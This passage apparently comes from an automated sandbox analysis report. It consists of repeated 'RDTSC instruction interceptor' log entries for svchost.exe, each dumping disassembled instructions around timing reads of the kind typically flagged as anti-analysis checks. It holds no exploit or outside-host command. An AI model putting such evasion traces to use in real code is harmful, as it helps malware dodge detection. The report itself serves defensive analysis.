0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59653h 0x00000031 call 2AA4FF96h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59530h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA591D0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59575h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F876h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59850h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA590F3h 0x00000033 call 2AA4FF96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F8F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59344h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59250h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4F8F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA598B3h 0x00000031 call 2AA4FBF6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4F7D6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59144h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59915h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA598F0h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
